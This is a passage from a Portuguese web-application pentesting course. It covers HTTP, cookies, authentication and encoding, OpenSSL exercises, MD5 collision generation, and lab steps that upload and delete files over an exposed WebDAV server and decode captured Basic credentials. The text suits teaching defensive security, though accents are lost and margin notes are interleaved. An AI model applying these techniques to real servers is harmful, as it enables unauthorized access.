nismo de camuflagem for utilizado, pode ser empregado para identificao do elemento,
durante a fase de reconhecimento em um ataque.
1 Set-Cookie: define um cookie no navegador, que um dos mecanismos utilizados para

manter uma sesso, no protocolo HTTP.
18
1 Expires: determina a validade do corpo da mensagem, isto , at que instante o nave-
gador pode utiliz-lo, a partir de uma cpia local, sem necessitar realizar novas requisi-
es para o mesmo recurso.
1 Content-Length: o comprimento em bytes do corpo da mensagem.
Cookies
Um cookie um elemento do protocolo HTTP, enviado ao navegador pelo servidor, com q
o objetivo de lembrar informaes de um usurio especfico. formado por uma cadeia
de caracteres, normalmente organizada em pares nome/valor, separados por ponto e
vrgula. Uma vez definido, enviado pelo navegador em toda requisio subsequente
ao mesmo domnio. Dois usos principais so a manuteno de sesso, uma vez que isso
no suportado nativamente pelo protocolo, e a autenticao de usurios.
Alguns atributos podem ser definidos para os cookies, alm dos pares contendo nome e
valor (Stuttard e Pinto, 2007):
1 expires: define por quanto tempo o cookie vlido e, assim, permite que o estado se
mantenha aps o navegador ser encerrado.
1 domain: define para quais domnios o cookie vlido, desde que o servidor seja um
membro daqueles.
1 path: define os caminhos para os quais o cookie vlido.

1 secure: demanda que o cookie seja enviado somente em requisies feitas por meio de HTTPS.
1 HttpOnly: quando definido, impede que seja acessado por cdigo executado no lado do
cliente. Porm, nem todo navegador honra esse atributo.
Autenticao HTTP
O protocolo HTTP possui dois mtodos nativos, Basic e Digest, para autenticar usurios q
antes que acessem recursos protegidos do servidor (Franks et al., 1999).
Ambos seguem o seguinte fluxo geral:
1. Usurio solicita um recurso protegido do servidor.
2. Se o usurio ainda no se autenticou, uma resposta com cdigo de estado 401

Unauthorized enviada ao navegador, juntamente com um cabealho WWW-
Authenticate, que define o tipo requerido de autenticao.
3. O usurio fornece usurio e senha em uma caixa de dilogo, os quais so enviados, em

BASE64 um cabealho Authorization, codificados em BASE64, no caso de Basic, e protegidos pelo
Esquema de algoritmo MD5, no caso de Digest.

codificao que utiliza
um subconjunto de 4. Se as credenciais enviadas forem vlidas, o servidor fornece o recurso solicitado e as
64 elementos da credenciais so includas em toda requisio subsequente ao mesmo domnio. Se no,
tabela ASCII para
representao o fluxo retorna ao segundo passo.
q
de informaes.
A impossibilidade de travamento de conta por mltiplas tentativas sucessivas e invlidas
de autenticao e a inexistncia de mecanismos de encerramento de sesso (exceto
fechando o navegador) so alguns dos problemas desses mtodos de autenticao.
19
Protocolo HTTP
Quais as principais caractersticas do protocolo HTTP?
Como funciona o protocolo HTTP?
Como requisies HTTP oriundas de um mesmo usurio podem ser agrupadas em uma
nica conversao?
Esquemas de codificao
Um processo de codificao consiste em substituir elementos de um conjunto por itens q
de outro, segundo uma regra pr-estabelecida, de modo que o simples conhecimento das
transformaes de ida e volta suficiente para realizar as tradues entre os dois domnios.
Em segurana de aplicaes web, esquemas de codificao podem ser empregados na

proteo contra alguns ataques, como o cross-site scripting, por exemplo, e, em testes de
invaso, para a construo correta dos vetores de teste, quando estes so passados por
meio de URLs, alm do contorno de filtros de entrada.
Codificao de URL
Uma URL ou mais geralmente uma URI pode conter somente caracteres ASCII impri- q
mveis, conforme especificado pela RFC 3986. Alguns deles possuem significado especial
em URLs, atuando como delimitadores, e, assim, so classificados como reservados.
Quando precisam ser utilizados como dados, nesse contexto, devem ser codificados,
para que possam ser corretamente identificados como tais. O mtodo empregado,
chamado de codificao de URL ou codificao percentual, consiste no uso de um
caractere % seguido de dois dgitos hexadecimais, que representam o valor numrico
do dado sendo codificado.
Por exemplo, um espao, cujo valor ASCII 32, mapeado para %20, de acordo com esse
esquema. Note que, em URLs, espaos tambm podem ser substitudos pelo caractere +.
importante mencionar que caracteres no imprimveis devem sempre ser codificados

segundo esse esquema, assim como os reservados, enquanto que os demais elementos
podem ser transformados, embora isso no seja obrigatrio.
A Figura 1.9 ilustra a codificao de todos os caracteres reservados de acordo com a RFC
3986. importante mencionar que caracteres no imprimveis devem sempre ser codifi-
cados segundo esse esquema, assim como os reservados, enquanto que os demais ele-
mentos podem ser transformados, se desejado, embora isso no seja obrigatrio.
20
Caractere Caractere Caractere Caractere
reservado codificado reservado codificado
! %21 = %3D
* %2A + %2B
%27 $ %24
( %28 , %2C
) %29 / %2F
; %3B ? %3F
: %3A # %23
Figura 1.9
Codificao dos @ %40 [ %5B
caracteres
reservados em URL. & %26 ] %5D
Codificao HTML
Alguns caracteres possuem significado especial em HTML e, assim, se for necessrio q
exibi-los como parte do contedo, necessrio codific-los, para que no sejam conside-
rados como metacaracteres pelo navegador web. Existem trs maneiras de efetuar essa
tarefa, descritas a seguir:
1 &<nome da entidade>; os caracteres especiais possuem nomes especficos em

HTML, os quais podem ser empregados no processo de codificao. Por exemplo, o
caractere < codificado como <, pois lt o nome de entidade especificado pelo
padro para esse smbolo.
1 &#<nmero decimal>; utiliza o valor Unicode do caractere, em base decimal. Por

exemplo, < codificado como <.
1 &#x<nmero hexadecimal>; idem ao caso acima, porm, representado em base

hexadecimal. Aplicando ao mesmo exemplo, obtm-se <.
21
22
Atividade 1 Arquiteturas e tecnologias de aplicaes web
Identifique a arquitetura e as tecnologias empregadas por uma das aplicaes web utili-
zadas pela empresa em que trabalha. Desenhe a topologia de rede contendo os elementos
principais que suportam a aplicao.
Atividade 2 Mecanismos criptogrficos

Nesta atividade, o aluno aprender como utilizar os diversos mecanismos criptogrficos
vistos na sesso de aprendizagem. A ferramenta que ser empregada o OpenSSL, alm
de outros programas acessrios. Para iniciar esta atividade, abra um terminal na mquina
virtual do aluno, mude para o diretrio Arquivos do Curso/sesso-01 e siga o roteiro abaixo.
Cifras simtricas
O Advanced Encryption Standard (AES) uma cifra simtrica de blocos adotada pelo
governo norte-americano e descrita no documento FIPS PUB 197. O AES especifica o algo-
ritmo Rijndael, operando sobre blocos de dados de 128 bits e com chaves de 128, 192 ou
256 bits. Note que a especificao original de Rijndael permite trabalhar com tamanhos de
blocos e chaves adicionais.
1. Gerao de chaves AES
O primeiro passo antes de se utilizar uma cifra simtrica na proteo do sigilo de informaes
gerar uma chave o mais aleatria possvel e distribu-la seguramente a todas as partes autori-
zadas. Quando o objetivo proteger uma comunicao, isso realizado como parte de um pro-
tocolo de estabelecimento de chaves. Por outro lado, se o propsito prover o sigilo de dados
armazenados, a chave gerada por um PRNG ou por um hardware criptogrfico.
Nesta atividade, vamos utilizar o comando rand, do OpenSSL, para a gerao de uma chave
de 128 bits:
openssl rand hex 16
A sada corresponde a uma cadeia de 32 dgitos hexa, que totaliza 128 bits, e pode ser
empregada como chave de um AES-128.
2. Cifrando mensagens
O comando para cifrar uma mensagem com o algoritmo AES, usando uma chave de 128 bits,
Captulo 1 - Roteiro de Atividades
no modo de operao CBC, :
openssl aes-128-cbc in <arquivo a ser cifrado> -out <arquivo cifrado>

-K <chave em hexadecimal>
-iv <vetor de inicializao>
Cifre o arquivo arq002.txt com a chave gerada no passo 1 e com iv = 0, armazenando o resultado
em arq002.enc. Verifique o tamanho desse arquivo e observe que ele mltiplo de 16 bytes
(128 bits tamanho do bloco AES), embora o arquivo original no seja. Isso ocorre porque cifras
23
simtricas de blocos operam sempre em unidades de tamanho fixo pr-definido e, quando o
ltimo bloco no mltiplo desse tamanho, ele completado em um processo de padding.
Repita o processo para o arquivo arq001.txt, armazenando o resultado em arq001.enc,

e verifique os tamanhos dos dois arquivos. Note que um bloco adicional de 16 bytes foi
adicionado ao arquivo cifrado, apesar do arquivo original ser mltiplo do tamanho do bloco
utilizado pelo AES. Nesse caso, um bloco de padding deve ser includo, para que o algoritmo
possa diferenciar os dois casos, no processo de deciframento.
3. Decifrando mensagens
O comando para decifrar mensagens com o algoritmo AES, usando uma chave de 128 bits,
no modo de operao CBC, :
openssl aes-128-cbc d in <arquivo cifrado> -out <arquivo decifrado>

-K <chave em hexadecimal>
-iv <vetor de inicializao>
Decifre o arquivo arq002.enc, armazenando o resultado em arq002.plain. Verifique que o

contedo desse arquivo o mesmo de arq002.txt.
Repita o processo com uma chave diferente da utilizada no processo de ciframento. Uma
mensagem de erro ser exibida, pois somente possvel decifrar o arquivo com a mesma
chave utilizada para proteg-lo.
Cifras assimtricas
O RSA, cujo nome deriva dos criadores Rivest, Shamir e Adleman, foi a primeira cifra assim-
trica da histria da criptografia e baseada na dificuldade da fatorao de nmeros inteiros
grandes. Atualmente, o criptossistema de chave pblica mais utilizado, principalmente, na
negociao de tneis SSL/TLS.
1. Gerao de um par de chaves RSA
Um par de chaves RSA consiste em uma chave pblica (e, n) e da chave privada correspon-
dente d. Execute o comando abaixo para gerao de um par de chaves de k bits, com k = 2048.
openssl genrsa out <arquivo que armazenar par de chaves>

<tamanho em bits da chave>
2. Visualizao do par de chaves RSA
Para visualizar o par de chaves gerado, execute o seguinte comando:
openssl rsa in <arquivo contendo par de chaves>
fcil observar que o formato da sada no adequado para a visualizao de cada uma das
chaves. Para uma sada mais amigvel, tente o seguinte comando:
openssl rsa in <arquivo contendo par de chaves> -text noout
A sada agora est em hexadecimal e tm-se: chave pblica = (publicExponent, modulus) e

chave privada = (privateExponent).
3. Exportao da chave pblica
Para que as pessoas possam cifrar mensagens para voc, necessrio que elas tenham uma
cpia autntica da sua chave pblica. Normalmente, isso feito por meio de certificados
24
digitais, mas, por enquanto, apenas exportaremos a chave pblica para um arquivo sepa-
rado, da seguinte maneira:
openssl rsa in <arquivo contendo par de chaves> -pubout >

<arquivo que conter chave pblica>
4. Cifrando mensagens
Nesse passo necessrio disponibilizar sua chave pblica para aqueles que queiram
enviar-lhe mensagens sigilosas. Assim, fornea o arquivo gerado no passo anterior para
um de seus colegas.
Crie um arquivo texto qualquer menor que 200 bytes e execute o comando abaixo para
cifr-lo, usando a chave pblica previamente fornecida.
openssl rsautl in <arquivo a ser cifrado> -out <arquivo cifrado>

-inkey <arquivo de chave pblica do destinatrio>
-pubin encrypt
Verifique o contedo do arquivo cifrado e veja que ele binrio, no tendo nenhuma relao
com o arquivo em claro. Porm, observe que o tamanho do arquivo exatamente o mesmo
que o tamanho da chave.
5. Decifrando mensagens
Repasse o arquivo gerado a seu colega que disponibilizou a chave pblica, para que ele
possa recuperar a mensagem original. Envie tambm o arquivo cifrado a outro colega que
no possua a chave privada correspondente.
O comando para deciframento :
openssl rsautl in <arquivo cifrado> -out <arquivo decifrado>

-inkey <arquivo com chave privada>
-decrypt
O destinatrio correto conseguir decifrar o arquivo e recuperar o arquivo original,

enquanto que o usurio que no possui a chave privada correspondente obter erro ao
executar o comando acima.
6. Arquivos grandes
Repita o passo explicado no item 4 para um arquivo que seja maior que o mdulo da chave
(divida o tamanho em bits por 8). O que acontece? Esse erro ocorre porque o RSA no pode
ser utilizado para proteger mensagens maiores que o tamanho do mdulo.
Funes de hash criptogrficas

1. Cite trs usos de funes de hash criptogrficas.
25
2. Listagem de funes de hash criptogrficas suportadas pelo OpenSSL
O OpenSSL suporta nativamente diversas funes de hash criptogrficas, alm de outros

algoritmos criptogrficos. Para verificar a lista de hashes suportados, digite:
man dgst
3. Clculo de hashes
A sintaxe utilizada pelo OpenSSL para clculo de hashes de um arquivo qualquer :
openssl dgst -<algoritmo> <lista de arquivos>
Calcule os hashes dos arquivos abaixo e verifique que so exatamente os mesmos que os
apresentados na tabela.
MD5
arqhash01.txt () d41d8cd98f00b204e9800998ecf8427e
arqhash02.txt (a) 0cc175b9c0f1b6a831c399e269772661
arqhash03.txt (abc) 900150983cd24fb0d6963f7d28e17f72
SHA-1
arqhash01.txt () da39a3ee5e6b4b0d3255bfef95601890afd80709
arqhash02.txt (a) 86f7e437faa5a7fce15d1ddcb9eaeaea377667b8
arqhash03.txt (abc) a9993e364706816aba3e25717850c26c9cd0d89d
RIPEMD-160
arqhash01.txt () 9c1185a5c5e9fc54612808977ee8f548b2258d31
arqhash02.txt (a) 0bdc9d2d256b3ee9daae347be6f4dc835a467ffe
arqhash03.txt (abc) 8eb208f7e05d987a9b044a8e98c6b087f15a0bfc
4. Colises em MD5 Documentos
Visualize com a aplicao evince os arquivos letter_of_rec.ps e order.ps, criados por Magnus
Daum e Stefan Lucks, e veja que so diferentes. Calcule tambm o MD5 dos arquivos, usando
o comando do exerccio anterior, e observe que eles colidem.
Repita o exerccio com os arquivos BarackObama.pdf, JohnMcCain.pdf e ParisHilton.pdf,

criados por Marc Stevens, Arjen Lenstra e Benne de Weger.
5. Colises em MD5 Programas

Execute os programas evil e good para constatar que realizam tarefas diferentes, embora
possuam o mesmo MD5.
6. Gerao de colises em MD5
Descompacte o arquivo fastcoll_v1.0.0.1_source.zip, digitando o comando:
unzip fastcoll_v1.0.0.1_source.zip
Em seguida, gere um executvel, compilando os fontes obtidos:
g++ *.cpp o md5col
26
Agora, execute o arquivo gerado para obter um par de arquivos, msg1 e msg2, para os quais
o MD5 colide. Caso a execuo demore mais que 5 minutos, cancele o programa e o reinicie.
./md5col
Verifique com o comando cmp que os arquivos gerados so diferentes e, com o comando
OpenSSL, que os hashes, mesmo assim, colidem:
cmp msg1 msg2

openssl dgst md5 msg1 msg2
Execute o programa md5col mais uma vez para gerar uma nova coliso e compare os valores
MD5 das mensagens geradas.
Assinaturas digitais
O RSA, alm de ser uma cifra, tambm um algoritmo de assinatura digital, que utiliza exa-
tamente a mesma construo e processo de gerao de chaves. A assinatura gerada por
meio da chave privada e a verificao ocorre utilizando-se a chave pblica.
1. Gerao de um par de chaves RSA
Conforme mencionado, o processo de gerao de chaves o mesmo que os das cifras RSA.
Assim, execute o comando abaixo para gerao de um par de chaves de 2048 bits:
openssl genrsa out <arquivo que armazenar par de chaves>

<tamanho em bits da chave>
2. Exportando a chave pblica
Para que pessoas possam verificar assinaturas digitais geradas por voc, necessrio que elas
tenham uma cpia autntica da sua chave pblica. Normalmente, isso feito por certificados
digitais, mas, por enquanto, apenas exportaremos a chave pblica para um arquivo separado:
openssl rsa in <arquivo contendo par de chaves> -pubout >

3. Assinando mensagens
O OpenSSL implementa o RSA com recuperao da mensagem e, por isso, somente podem
ser assinados dados menores que o tamanho da chave. Escolha um arquivo que deseja
assinar digitalmente e execute o comando abaixo.
openssl rsautl -sign

in <arquivo a ser assinado>
-out <arquivo que armazenar a assinatura>
-inkey <arquivo contendo chave privada>
pkcs
Repasse o arquivo de assinatura digital a outro aluno, juntamente com sua chave pblica,
para que ele possa verificar a assinatura.
4. Verificando assinaturas
Para verificar a assinatura enviada pelo seu colega, utilize o comando:
openssl rsautl verify

-in <arquivo contendo assinatura>
27
-inkey <arquivo contendo chave pblica>
-pubin
-pkcs
-out <arquivo recuperado da assinatura>
Se a assinatura for vlida, nenhuma mensagem ser exibida e o arquivo original ser recu-
perado e gravado no arquivo especificado pelo parmetro out.
Certificados digitais
Conforme discutido, em criptossistemas assimtricos fundamental que sejam utilizadas
chaves pblicas autnticas. O no atendimento desse requisito de segurana torna os proto-
colos vulnerveis a ataques man-in-the-middle, por exemplo. Uma maneira de solucionar esse
problema consiste em encapsular uma chave pblica em um certificado digital, que digital-
mente assinado por uma terceira parte confivel, chamada de autoridade certificadora.
O objetivo desta atividade ilustrar como certificados podem ser requisitados e como o
processo de emisso de certificados digitais, por parte da autoridade certificadora.
1. Gerando a requisio de certificado
Considere-se o par de chaves gerado na atividade sobre assinaturas digitais. Para que ter-
ceiros possam verificar assinaturas geradas com a chave privada em questo, eles precisam
ter acesso chave pblica autntica correspondente, a qual normalmente distribuda
encapsulada em um certificado digital. Para esse fim, o primeiro passo aps a gerao do
par de chaves preparar uma requisio (no formato PKCS #10) a ser enviada a uma autori-
dade certificadora, para emisso do certificado. O comando a ser executado :
openssl req new key <arquivo contendo par de chaves>

out <arquivo que conter requisio>
sha1
O OpenSSL solicitar as informaes a serem includas no certificado:
1 Country Name (2 letter code) [GB]: - Ex.: br

1 State or Province Name (full name): - Ex.: sp
1 Locality Name (eg, city) [Newbury]: - Ex.: Campinas
1 Organization Name (eg, company) [My Company Ltd.]: - Ex.: RNP
1 Organizational Unit Name (eg, section) []: - Ex.: ESR
1 Common Name (eg, your name or your servers hostname) []: - Ex.: Fulano de Tal
1 Email Address []: - Ex.: fulano@esr.rnp.br
1 A challenge password []: - Ex.: senhadificil
1 An optional company name []: - Ex.: Outro
2. Exibindo a requisio de certificado
Para visualizar a requisio, execute o seguinte comando:
openssl req in <arquivo de requisio de certificado>
fcil observar que o formato de sada no adequado para a visualizao da requisio.

Para uma sada mais amigvel, tente o seguinte comando:
openssl req in <arquivo de requisio de certificado> text noout
28
3. Emitindo o certificado
A requisio gerada deve ser encaminhada autoridade certificadora para emisso do

certificado. Na prtica, tambm necessrio provar sua identidade, pessoalmente, por meio
de documentos apropriados (se no fosse assim, como seria possvel atestar que a chave
pblica pertence a fulano?). O software para uma pequena CA j est instalado nos compu-
tadores e, assim, poderemos ver como o certificado gerado a partir da requisio.
O comando que pode ser executado para emitir o certificado :
openssl ca md sha1
in <arquivo de resquisio de certificado>
out <arquivo que conter o certificado>
Os dados da solicitao so exibidos e o OpenSSL pergunta se se deseja assinar o certifi-

cado. Aps uma resposta positiva, um certificado ser emitido e armazenado no diretrio /
etc/ssl/ca-esr-rnp/newcerts, com cpia no arquivo especificado pelo parmetro out.
4. Exibindo as informaes do certificado
Para visualizar o contedo do certificado, execute o seguinte comando:
openssl x509 in <certificado digital> text noout
5. Verificando a assinatura da AC sobre o certificado
De nada adianta receber um certificado digital e no verificar as assinaturas digitais na cadeia

de certificados que levam AC raiz. Se esse importante passo no for realizado, continuamos
sem poder atestar a autenticidade da chave pblica recebida. Verifique com o comando abaixo
o certificado emitido, considerando que o certificado da AC raiz cacert.pem:
openssl verify CAfile <certificado da AC raiz>

<certificado a ser verificado>
Se a validao no der erros, o nome do certificado ser escrito seguido de Ok.
6. Extraindo a chave pblica contida no certificado
Para cifrar dados para uma pessoa ou verificar assinaturas que ela tenha gerado, neces-
srio extrair a chave pblica do certificado digital validado. O comando que realiza isso :
openssl x509 in <certificado digital> -pubkey noout >

Esta atividade tem o objetivo de ilustrar os protocolos HTTP e HTTPS, permitindo que o
aluno compreenda diversos aspectos envolvidos em uma interao com uma aplicao web.
Requisio e resposta
O objetivo desta atividade ilustrar como so requisies e respostas HTTP, por meio da
anlise dos pacotes de uma solicitao ao servidor web de exemplo. Os passos que devem
ser executados esto descritos nos itens a seguir:
1. Inicie o Wireshark, presente no menu Aplicativos\Curso Ferramentas. Para conseguir cap-

turar os pacotes, a aplicao deve ser executada em modo privilegiado e, por isso, uma
senha ser solicitada. Digite esruser e clique em Ok.
29
2. Clique no primeiro cone da barra de ferramentas para listar as interfaces de rede dispon-
veis para captura. Na caixa de dilogo que aparece, clique em Options, na linha eth1. No
campo Capture filter, digite tcp port http e clique em Start para iniciar a captura de pacotes.
3. Inicie o Firefox e digite na barra de endereos exemplo.esr.rnp.br.
4. Pare a captura de pacotes no Wireshark clicando no quarto boto da barra de ferramentas

(Stop the running live capture).
5. Role a barra da janela de captura para exibir os primeiros pacotes capturados. Procure
pela linha contendo GET / HTTP/1.1 (linha 4), clique com o boto esquerdo e selecione
Follow TCP Stream.
6. Uma janela ser exibida contendo a requisio GET inicial e a resposta fornecida pelo
servidor web. Observe os diversos cabealhos presentes e que o corpo da resposta
contm um documento HTML.
7. Para finalizar, clique em Fechar e depois em Clear.
Mtodos
Nesta atividade sero explorados diversos outros mtodos HTTP, que no GET e POST, e
ilustradas algumas vulnerabilidades que podem decorrer de um servidor mal configurado:
1. Inicie um terminal, clicando no cone presente na rea de trabalho.
2. Para verificar os mtodos suportados pelo servidor web, digite:
telnet exemplo.esr.rnp.br 80
OPTIONS / HTTP/1.0
Host: exemplo.esr.rnp.br
3. Pressione Enter duas vezes e analise a resposta dada pelo servidor. Observe que o WebDAV
est habilitado, bem como mtodos perigosos como DELETE, COPY e MOVE.
O WebDAV compreende um conjunto de comandos que podem ser utilizados para

gerenciar arquivos em um servidor web de maneira colaborativa. Quando disponi-
bilizado para o pblico externo, pode facilitar o comprometimento do servidor, ao
permitir acesso ao sistema de arquivos.
4. Use o utilitrio cadaver para acessar as funcionalidades DAV do servidor:
cadaver http://exemplo.esr.rnp.br
5. Para listar os comandos disponveis, digite:
help
6. Liste os arquivos disponveis no sistema de arquivos:
ls
7. Faa o upload do arquivo arq001.txt e liste o diretrio novamente:
put arq001.txt
ls
30
8. O arquivo copiado pode ser removido por meio do comando delete do DAV, mas, como
exerccio, remova-o por meio de uma requisio HTTP, em uma nova janela de terminal:
DELETE /arq001.txt HTTP/1.0
9. Pressione Enter duas vezes e veja o resultado no cadaver, listando os arquivos presentes
no diretrio.
10. O mtodo HEAD equivalente ao GET, com a diferena de que o corpo da resposta no
fornecido. Vejamos:
HEAD / HTTP/1.1
11. Pressione Enter duas vezes e observe a ausncia do corpo da mensagem.
Cdigos de estado
Nas atividades anteriores, o servidor retornou sempre o cdigo de estado 2XX, indicando
que a requisio foi atendida com sucesso. Na presente tarefa, sero apresentadas situa-
es em que outros cdigos so fornecidos pelo servidor.
1. Em uma janela de terminal, digite os comandos abaixo, finalizando com Enter duas vezes:
telnet w3s.esr.rnp.br 80
GET / HTTP/1.1
Host: w3s.esr.rnp.br
A resposta com cdigo 302 indica ao navegador que o recurso foi encontrado, mas que um
redirecionamento necessrio para acessar o recurso.
2. Em uma janela de terminal, digite os comandos abaixo, finalizando com Enter duas vezes:
GET /inexistente HTTP/1.1
A resposta com cdigo 404 indica ao navegador que o recurso no foi encontrado no servidor.
3. Em uma janela de terminal, digite os comandos abaixo:
BLA
Como no existe um mtodo BLA, o servidor retorna uma resposta com cdigo de estado
501 Method not implemented.
Autenticao Basic
A autenticao bsica do protocolo HTTP pode ser configurada para restringir acesso a
reas sensveis do servidor web. Conforme visto, algumas desvantagens desse mtodo
incluem a impossibilidade de travamento de conta e de encerramento de sesses ociosas.
Siga o seguinte roteiro para essa atividade:
31
1. Inicie nova captura no Wireshark, da mesma maneira que na atividade de Requisio
e Resposta.
2. Caso a mensagem Save capture file before starting a new capture? aparea, clique em
Continue without saving.
3. Inicie o navegador e acesse exemplo.esr.rnp.br/basic.
4. Fornea para usurio e senha o texto esruser.
5. Pare a captura de pacotes no Wireshark, clicando no quarto boto da barra de ferra-

mentas (Stop the running live capture).
pela primeira linha contendo GET /basic HTTP/1.1 (linha 4), clique com o boto esquerdo
e selecione Follow TCP Stream.
7. Observe que o servidor retornou uma resposta com cdigo 401, o que fez com que o nave-
gador exibisse a caixa de dilogo solicitando usurio e senha. Clique em Filter out this stream.
8. Procure pela nova requisio contendo GET e repita o processo do Passo 6.
9. Veja que o navegador adicionou o cabealho Authorization: Basic ZXNydXNlcjplc3J1c2Vy

requisio. A ltima parte corresponde ao usurio e senha em BASE64, que pode ser
decodificada com o comando:
echo ZXNydXNlcjplc3J1c2Vy | base64 -d; echo -e \n
10. Para finalizar, clique em Fechar e depois em Clear.
Autenticao Digest
A autenticao Digest do protocolo HTTP, assim como o modo Basic, pode ser configurada
para restringir acesso a reas sensveis do servidor web e possui as desvantagens de no
ser possvel travar contas, nem de encerrar sesses ociosas. A grande diferena que ela
transmite o usurio e senha protegidos por mtodos no reversveis. Para estudar esse
modo de autenticao, siga o seguinte roteiro:
1. Inicie nova captura no Wireshark, da mesma maneira que na atividade de Requisio

e Resposta.
2. Caso a mensagem Save capture file before starting a new capture? aparea, clique em
Continue without saving.
3. Se o Firefox j estiver aberto, pressione Ctrl + Shift + Del para limpar o histrico recente.
4. Acesse exemplo.esr.rnp.br/digest pelo Firefox.
5. Fornea para usurio e senha o texto esruser.

pela primeira linha contendo GET /digest HTTP/1.1 (linha 4), clique com o boto esquerdo
e selecione Follow TCP Stream.
7. Observe que o servidor retornou uma resposta com o cdigo 401, o que fez com que o
navegador exibisse a caixa de dilogo solicitando usurio e senha. Contudo, diferente-
mente do modo Basic, o cabealho WWW-Authenticate est definido como Digest e um
nonce foi fornecido. Clique em Filter out this stream.
8. Procure pela nova requisio contendo GET e repita o processo do passo 6.
32
9. Veja que o navegador adicionou o cabealho Authorization: Digest requisio, com
diversos parmetros. O elemento response demonstra o conhecimento da senha pelo
usurio e resultado da aplicao de uma funo de hash criptogrfica concatenao
de uma srie de informaes.
10. Para finalizar este exerccio, clique em Fechar e depois em Clear.
HTTPS
O protocolo HTTPS basicamente consiste no transporte de HTTP por um canal SSL/TLS.
Se o servidor estiver bem configurado, o tnel atender os requisitos de confidencialidade,
integridade, autenticidade da origem da mensagem e de entidades. Siga o seguinte roteiro
para constatar isso:
1. Inicie nova captura no Wireshark, da mesma maneira que na atividade de Requisio e

Resposta, mas preencha Capture filter com tcp port https.
2. Acesse https://w3s.esr.rnp.br com o Firefox.

pela linha contendo Client Hello (linha 4), que o incio da negociao TLS.
5. A primeira troca de dados acontece a partir da linha 12 (Application Data). Selecione-a e,

no painel central, selecione Secure Socket Layer. Role o painel inferior e observe que no
h contedo legvel como parte da mensagem.
33
Bibliografia 1
1 BARKER, Elaine; BARKER, William; BURR, William; POLK, William e SMID, Miles.
Recommendation for key management part 2: Best practices for key management
organization. NIST Special Publication 800-57, NIST, 2007b.
1 BERNERS-LEE, Tim; FIELDING, Roy T. e MASINTER, Larry. RFC 3986: Uniform Resource
Identifier (URI): Generic Syntax, 2005.
1 FIELDING, Roy T.; GETTYS, James; MOGUL, Jeffrey C.; NIELSEN, Henrik Frystyk; MASINTER,
Larry; LEACH, Paul J. e BERNERS-LEE, Tim. RFC 2616: Hypertext Transfer Protocol
HTTP/1.1, 1999.
1 FRANKS, John; HALLAM-BAKER, Phillip M.; HOSTETLER, Jeffery L.; LAWRENCE, Scott D.;
LEACH, Paul J.; LUOTONEN, Ari e STEWART, Lawrence C. RFC 2617: HTTP Authentication:
Basic and Digest Access Authentication, 1999.
1 KISSEL, Richard; STINE, Kevin; SCHOLL, Matthew; ROSSMAN, Hart; FAHLSING, Jim e
GULICK, Jessica. Security considerations in the system development life cycle. NIST Special
Publication SP 800-64, National Institute of Standards and Technology, 2008.
1 LITCHFIELD, David. The Oracle Hackers Handbook Hacking and Defending Oracle. Wiley
Publishing, Inc., 2007.
1 MCGRAW, Gary. Software Security: Building Security In. Addison-Wesley Professional, 2006.
1 MENEZES, Alfred J.; VAN OORSCHOT, Paul. C. e VANSTONE, Scott. A. Handbook of Applied
Cryptography. CRC Press, 5th edition, 2001.
1 MEUCCI, Matteo et al. OWASP testing guide v3.0. OWASP, 2008.

1 ORACLE. Your First Cup: an Introduction to the Java EETM Platform. PartNo: 821177010.
Junho. Oracle, 2010.
1 PCI. Payment Card Industry (PCI) Data Security Standard Requirements and Security
Assessment Procedures v. 1.2.1. PCI Security Standards Council, 2009a.
1 PCI. Payment Card Industry (PCI) Payment Application Data Security Standard (PA-DSS)
version 1.2.1. PCI Security Standards Council, 2009b.
1 SEACORD, Robert C. Secure Coding in C and C++. Addison-Wesley Professional, 2005.

1 SHANNON, Claude. Communication Theory of Secrecy Systems, Bell Systems Technical
Journal, Vol. 28, p. 656-715, 1949.
1 SHKLAR, Leon e ROSEN, Richard. Web Application Architecture: Principles, Protocols and
Practices. 2. Edio. Wiley, 2009.
1 STEVENS, Marc; SOTIROV, Alexander; APPELBAUM, Jacob; LENSTRA, Arjen; MOLNAR,

David; OSVIK, Dag Arne e DE WEGER, Benne. Short Chosen-Prefix Collisions for MD5 and
the Creation of a Rogue CA Certificate. In: Proceedings of the 29th Annual International
Cryptology Conference on Advances in Cryptology LNCS. Vol. 5677. p. 55-69. Springer-Verlag,
2009.
1 STUTTARD, Dafydd; PINTO, Marcus. The Web Application Hackers Handbook. Wiley
34
1 VAN DER STOCK, Andrew; CRUZ, Dinis; CHAPMAN, Jenelle; LOWERY, David; KEARY, Eoin;
MORANA, Marco M.; ROOK, David; WILLIAMS, Jeff e PREGO, Paulo. OWASP code review
guide v1.1. OWASP, 2008.
1 WANG, Xiaoyun; YU, Hongbo. How to break MD5 and other hash functions. Eurocrypt 2005.
Springer-Verlag, 2005.
1 WIESMANN, Adrian; CURPHEY, Mark; VAN DER STOCK, Andrew e STIRBEI, Ray. A guide to
building secure web applications and web services. OWASP, 2005.
1 WYSOPAL, Chris; NELSON, Lucas; ZOVI, Dino Dai e DUSTIN, Elfriede. The Art of Software
Security Testing: Identifying Software Security Flaws. Symantec Press, 2006.
Captulo 1 - Bibliografia 1
35
36
2
Reconhecimento e mapeamento
objetivos
Apresentar uma metodologia de teste de invaso de aplicaes web e as principais

ferramentas que podem ser utilizadas no processo, abordando, especialmente,
as fases de reconhecimento e mapeamento.
conceitos
Tipos e metodologia de teste de invaso, proxy de interceptao, web spiders,
fuzzers, varredores de portas e servios, varredores de vulnerabilidades,
reconhecimento, mapeamento, controles no lado cliente.
Introduo
Teste de invaso, tambm chamado de teste de intruso, teste de penetrao ou pentest, q
um mtodo utilizado para verificar a segurana de um ambiente, plataforma ou sistema,
por meio da simulao de ataques reais explorando as vulnerabilidades encontradas.
Varredura de
vulnerabilidades Diferentemente de uma varredura de vulnerabilidades, que muitas vezes recorre ao
Mtodo comumente simples uso de ferramentas automatizadas, pentest um processo cclico que depende
automatizado
principalmente do conhecimento tcnico do auditor de segurana que o realiza.
para identificar
vulnerabilidades em Este fato acaba sendo ressaltado quando o teste realizado contra aplicaes web, devido
elementos e sistemas
s caractersticas nicas que cada uma delas apresenta, por serem normalmente desenvol-
de rede. Cada um dos
ativos pertencentes ao vidas para uso em uma nica empresa ou entidade.
escopo da varredura
testado contra uma Segundo Scarfone et al (2008), testes de invaso tambm so teis para medir: a habilidade
srie de fraquezas da equipe de detectar e se defender contra ataques reais do ambiente alvo; o nvel neces-
conhecidas para a
srio de sofisticao de um atacante para comprometer o sistema; quo bem um sistema se
plataforma especfica.
comporta sob ataques, e as medidas adicionais que precisam ser adotadas para mitigar os
Captulo 2 - Reconhecimento e mapeamento
